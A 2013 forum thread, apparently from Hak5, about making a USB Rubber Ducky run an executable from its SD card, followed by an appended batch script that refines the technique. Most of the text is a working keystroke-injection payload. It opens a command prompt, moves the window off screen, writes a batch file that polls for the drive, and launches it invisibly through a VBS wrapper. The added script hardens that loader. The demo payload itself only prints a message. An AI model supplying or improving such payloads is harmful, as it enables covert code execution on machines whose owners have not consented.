blacblu, Posted February 5, 2013

Is it possible to store data (.exe and .dll) on the Rubber Ducky (or the SD card), copy this data to a specific folder and run the .exe?
no42, Posted February 5, 2013 (edited)

Yes. Look at the Twin Duck firmware (c_duck_v2.hex); it can be executed straight from the HID payload. There should be info in the forums; Overwraith has some demo code somewhere?

Edited February 5, 2013 by midnitesnake
blacblu (Author), Posted February 5, 2013

Do you have any tutorials on this approach, so I can make sure of the reliability before buying the Rubber Ducky?
no42, Posted February 5, 2013

Information on the PoC (before Xmas) is here: http://forums.hak5.org/index.php?/topic/28162-introducing-twin-duck-firmware/?p=214115

Now you can use DuckyScript to deliver a HID payload rather than the previous hard-coded executable. You can use the following code to search for the drive via its label:

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d

then execute a binary on the Ducky with

%myd%/my_executable.exe

or

%myd%/my_batfile.bat

Other info is on the website, in my signature.
overwraith, Posted February 8, 2013 (edited)

The following is a payload I have been working on that waits until a drive labeled "DUCKY" is mounted. I have used some of midnightsnake's code in this payload. I have been having some problems with delays, so I went a little overboard with the "DELAY 25" codes. The name of the file that is run can be changed to .exe; I am just having it run a batch for testing purposes. The line that says "STRING %myd%\myEXE.bat" is the line that executes the executable.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
DELAY 4000
REM Using the run command for a broader OS base.
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
REM Move the console window off screen (ALT+SPACE, M, then 100 DOWNARROWs).
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 25
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
DELAY 25
STRING erase /Q DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING copy con DuckyWait.bat
DELAY 25
ENTER
DELAY 25
REM DuckyWait.bat
DELAY 25
STRING :while1
DELAY 25
ENTER
DELAY 25
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
DELAY 25
ENTER
DELAY 25
STRING if Exist %myd% (
DELAY 25
ENTER
DELAY 25
STRING goto break
DELAY 25
ENTER
DELAY 25
STRING )
DELAY 25
ENTER
DELAY 25
STRING timeout /t 30
DELAY 25
ENTER
DELAY 25
STRING goto while1
DELAY 25
ENTER
DELAY 25
STRING :break
DELAY 25
ENTER
DELAY 25
REM Continue script.
DELAY 25
STRING %myd%\myEXE.bat
DELAY 25
ENTER
DELAY 25
REM CTRL+Z then ENTER ends "copy con" and writes the file.
CONTROL z
DELAY 25
ENTER
DELAY 25
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
DELAY 25
REM Delete vbs file if already exists
DELAY 25
STRING erase /Q invis.vbs
DELAY 25
ENTER
DELAY 25
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
DELAY 25
STRING copy con invis.vbs
DELAY 25
ENTER
DELAY 25
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
DELAY 25
ENTER
DELAY 25
CONTROL Z
DELAY 25
ENTER
DELAY 25
REM RUN THE BATCH FILE
DELAY 25
STRING wscript.exe invis.vbs DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING EXIT
ENTER

The following is the batch file that is run after the "DUCKY" drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of "Message.txt", which will probably be in "C:\Windows\system32".

REM Message.txt
echo Hello World!!!
echo Hello World!!! > Message.txt

P.S. When is the online payload generator getting back online!!! I need the REPEAT command!!!! You will need to replace REPEAT at the beginning of the code with 100 repeats, so copy-pasty.

Edited February 8, 2013 by overwraith
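A stand-alone batch version of the find-the-DUCKY-volume-and-run logic from no42's one-liner and overwraith's DuckyWait.bat above. This is an added example, not code from either post or from the Twin Duck firmware. It assumes the volume label DUCKY and a payload file named payload.bat on that volume (both are assumptions you would change to match your SD card), bounds the polling loop so a Ducky that never mounts does not leave a hidden cmd.exe spinning forever, pulls the drive letter with a wmic "where" filter so a label that merely contains the text DUCKY on another volume cannot match, and checks that the payload exists before calling it.

```batch
@echo off
REM DuckyWait.bat (added example, not the original poster's payload)
REM Polls for a volume whose label is exactly LABEL, then runs PAYLOAD from it.
REM Assumed values: the label "DUCKY" and the file name "payload.bat".
setlocal
set "LABEL=DUCKY"
set "PAYLOAD=payload.bat"
set "MAXTRIES=20"
set "POLLSECS=5"
set "TRIES=0"

:poll
set "DRIVE="
REM wmic prints a "DriveLetter" header, the letter (e.g. "E:") and blank lines;
REM findstr keeps only lines that start with an upper-case letter and a colon.
for /f "usebackq tokens=1" %%d in (`wmic volume where "label='%LABEL%'" get driveletter ^| findstr /r "^[A-Z]:"`) do set "DRIVE=%%d"
if defined DRIVE goto found

set /a TRIES+=1
if %TRIES% geq %MAXTRIES% (
    echo No volume labelled %LABEL% after %MAXTRIES% attempts, giving up.
    exit /b 1
)
timeout /t %POLLSECS% /nobreak >nul
goto poll

:found
REM Refuse to run if the file is not on the volume we just located.
if not exist "%DRIVE%\%PAYLOAD%" (
    echo %DRIVE%\%PAYLOAD% is missing.
    exit /b 2
)
echo Running %DRIVE%\%PAYLOAD%
call "%DRIVE%\%PAYLOAD%"
exit /b %errorlevel%
```

Run it the same way as the thread's DuckyWait.bat, either directly or through the invis.vbs wrapper, and check %errorlevel% afterwards: 1 means the volume never appeared, 2 means the volume mounted but the payload file was not on it. One caveat for newer hosts: wmic is deprecated and is absent from recent Windows 11 builds, so this script will always report "giving up" there; the equivalent lookup in PowerShell is `Get-Volume -FileSystemLabel DUCKY`, which returns the DriveLetter property directly.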